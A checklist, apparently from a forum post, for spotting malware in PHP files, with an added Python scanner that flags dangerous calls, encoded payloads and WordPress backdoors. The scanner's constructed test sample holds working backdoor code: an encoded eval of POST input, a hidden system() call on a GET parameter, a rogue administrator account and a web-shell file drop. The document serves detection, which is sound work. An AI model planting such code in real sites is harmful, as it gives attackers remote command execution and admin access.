I made a quick checklist to avoid manipulated PHP scripts with malware. I hope you find it useful.
- Open the PHP file in your IDE or a plain-text code editor, so that you are reading the raw source rather than a rendered page.
- Look for suspicious function calls: Search for functions that execute code or shell commands:
  - eval()
  - exec()
  - shell_exec()
  - system()
  - passthru()
  - popen()
  - proc_open()
  - assert() with a string argument, and create_function() (both evaluate a string as code in PHP 7; both were removed in PHP 8)
  A hit is not proof by itself. Check where the argument comes from: an argument built from $_GET, $_POST, $_REQUEST or $_COOKIE is a remote shell, not a feature.
- Check for base64 encoded strings: Malware often uses base64 encoding to hide malicious code. Look for:
  - base64_decode(), often wrapped in gzinflate(), gzuncompress() or str_rot13() and fed straight into eval()
  - Long strings of seemingly random characters
  Decode the string before judging it: embedded icons, fonts and keys are long base64 strings too. It is malware when the decoded output is PHP code.
- Inspect cURL usage: While cURL itself isn't malicious, it can be used for unauthorized data transfer. Look for:
  - curl_init()
  - curl_setopt()
  - curl_exec()
  Check the URLs being accessed and ensure they're legitimate. Be suspicious of a URL that comes from a variable, and of request bodies (CURLOPT_POSTFIELDS) that carry site data or credentials out.
- Examine file operations: Look for suspicious file read/write operations:
  - fopen()
  - file_get_contents()
  - file_put_contents()
  Pay attention to the path: reads of wp-config.php or other credential files, writes into web-reachable directories such as uploads/, and paths built from request parameters.
- Check for obfuscated code: Malware often uses obfuscation techniques. Look for:
  - Extremely long lines of code
  - Unusual variable names (e.g., $a1b2c3)
  - Strings of hexadecimal escapes (e.g., "\x65\x76\x61\x6c", which spells eval) or chr() sequences that build a function name
  - Function names assembled at runtime and called as a variable function, e.g. $f = 'sys' . 'tem'; $f($cmd);
  Minified libraries also have very long lines, so compare the file with the vendor's original release before you call it malware.
- Verify included files: Check all include() and require() statements to ensure they're including legitimate files. Be suspicious of a path that comes from a variable or is a URL (remote inclusion needs allow_url_include, which should stay off).
- Look for unauthorized database queries: Search for database operations that might be extracting or modifying data:
  - mysql_query() (PHP 5 only; the mysql extension was removed in PHP 7)
  - mysqli_query()
  - $wpdb->query() (in WordPress)
  A query that resets a password, inserts a user row or dumps a table is the tell. Also check whether the query string is concatenated from request input.
- Check for hidden backdoors: Look for code that might create admin users or provide unauthorized access:
  - wp_insert_user() and wp_create_user() (in WordPress), especially with 'role' => 'administrator'
  - The equivalent user-creation or role-change call of whatever CMS you run
  - Authentication bypasses: code that compares a secret in $_GET, $_COOKIE or a request header and then logs you in or skips the login check
  When in doubt, compare the file against a clean copy. For WordPress core, wp core verify-checksums (WP-CLI) lists files that differ from the release.
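The whole checklist as a first-pass scanner, added here as an example; it is not code from the original post. It is written in Python rather than PHP so it can be run over a suspect tree from a clean machine. The two PHP files it scans are constructed inline, taint is judged per line (a request superglobal on the same line as a dangerous call), and the severity labels, the decoder list and the gzinflate handling are my own choices, not anything the post specifies:

```python
# Added example: triage a PHP file against the checklist above. Not the post's own
# code; the PHP inputs below are constructed. A "taint" hit means a request
# superglobal sits on the same line as a sink: a place to read, not a verdict.
import base64
import binascii
import re
import zlib

DANGEROUS = {"eval", "exec", "shell_exec", "system", "passthru", "popen",
             "proc_open", "assert", "create_function"}
USER_CREATION = {"wp_insert_user", "wp_create_user"}
SINKS = [  # (label, function names, base severity)
    ("code execution", DANGEROUS, "high"),
    ("decoder", {"base64_decode", "gzinflate", "gzuncompress", "str_rot13"}, "medium"),
    ("network", {"curl_init", "curl_setopt", "curl_exec"}, "medium"),
    ("file operation", {"fopen", "file_get_contents", "file_put_contents"}, "medium"),
    ("database query", {"mysql_query", "mysqli_query"}, "info"),
    ("user creation", USER_CREATION, "high"),
]
PATTERNS = [  # (regex, base severity, message) for shapes without a fixed function name
    (re.compile(r"\$[A-Za-z_]\w*\s*\("), "high", "variable function call $f()"),
    (re.compile(r"->\s*query\s*\("), "info", "database query via ->query()"),
    (re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*(?:\$|['\"]https?:)"), "high",
     "include/require with a variable or URL path"),
    (re.compile(r"(?:\\x[0-9A-Fa-f]{2}){4,}"), "medium", "run of \\x hex escapes"),
]
CALL = re.compile(r"\b([A-Za-z_]\w*)\s*\(")
USER_INPUT = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b")
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{32,}={0,2})['\"]")
RANK = {"clean": 0, "info": 1, "medium": 2, "high": 3, "critical": 4}
BUMP = {"info": "high", "medium": "high", "high": "critical"}  # taint raises severity

def _as_text(raw):
    """bytes -> str when they are printable ASCII (plus whitespace), else None."""
    text = raw.decode("ascii", "replace")
    return text if raw.isascii() and all(c.isprintable() or c in "\r\n\t" for c in text) else None

def decode_layers(blob, max_depth=5):
    """Peel nested base64 layers, each optionally raw-deflated (what gzinflate() undoes).
    Returns the input unchanged when it is binary (an icon, a hash, key material)."""
    text = blob
    for _ in range(max_depth):
        try:
            raw = base64.b64decode(text, validate=True)
        except (binascii.Error, ValueError):
            break
        decoded = _as_text(raw)
        if decoded is None:
            try:
                decoded = _as_text(zlib.decompress(raw, -15))
            except zlib.error:
                break
        if decoded is None:
            break
        text = decoded
    return text

def scan_php(source):
    """Return (line_no, severity, message) findings for one PHP source string."""
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        tainted = bool(USER_INPUT.search(line))
        tag = " with request data on the line" if tainted else ""
        calls = set(CALL.findall(line))
        for label, names, base in SINKS:
            for name in sorted(calls & names):
                findings.append((no, BUMP[base] if tainted else base, f"{label} {name}(){tag}"))
        for regex, base, msg in PATTERNS:
            if regex.search(line):
                findings.append((no, BUMP[base] if tainted else base, msg + tag))
        for match in B64_LITERAL.finditer(line):
            inner = decode_layers(match.group(1))
            if inner == match.group(1):
                continue  # binary blob (icon, hash, key material), not hidden code
            hidden = set(CALL.findall(inner)) & (DANGEROUS | USER_CREATION)
            if hidden or USER_INPUT.search(inner):
                findings.append((no, "critical", f"encoded payload hides {sorted(hidden)}"))
            else:
                findings.append((no, "info", f"encoded text: {inner[:40]!r}"))
    return findings

def max_severity(findings):
    return max((sev for _, sev, _ in findings), key=RANK.__getitem__, default="clean")

ICON_B64 = base64.b64encode(b"\x89PNG\r\n\x1a\n" + bytes(40)).decode()  # constructed icon blob
LEGIT_PHP = ("<?php\nrequire_once __DIR__ . '/includes/helpers.php';\n$icon = '" + ICON_B64
             + "';\n$rows = $wpdb->get_results('SELECT id FROM items WHERE active = 1');\n")
INNER = b"if (isset($_POST['c'])) { eval($_POST['c']); }"  # what the constructed dropper really runs
_co = zlib.compressobj(9, zlib.DEFLATED, -15)                  # raw deflate, as PHP gzdeflate()
PAYLOAD = base64.b64encode(_co.compress(INNER) + _co.flush()).decode()
BACKDOOR_PHP = (
    "<?php\n$f = 'sys' . 'tem';\neval(gzinflate(base64_decode('" + PAYLOAD + "')));\n"
    "if ($_GET['k'] === 'x') { $f($_GET['cmd']); }\n"
    "wp_insert_user(['user_login' => 'wp_admin', 'user_pass' => 'x', 'role' => 'administrator']);\n"
    "file_put_contents(ABSPATH . 'wp-content/uploads/.cache.php', $_POST['d']);\n"
)
if __name__ == "__main__":
    for name, src in (("legit.php", LEGIT_PHP), ("backdoor.php", BACKDOOR_PHP)):
        print(name, max_severity(scan_php(src)), *scan_php(src), sep="\n  ")
```

decode_layers is the caveat from the base64 step made concrete: a long string is only reported as a payload when it decodes (through as many base64 and deflate layers as needed) to text that contains one of the dangerous calls or a request superglobal, and a blob that stays binary, like the embedded icon in the benign sample, produces no finding at all. Replace the two sample strings with open(path).read() to run it over real files.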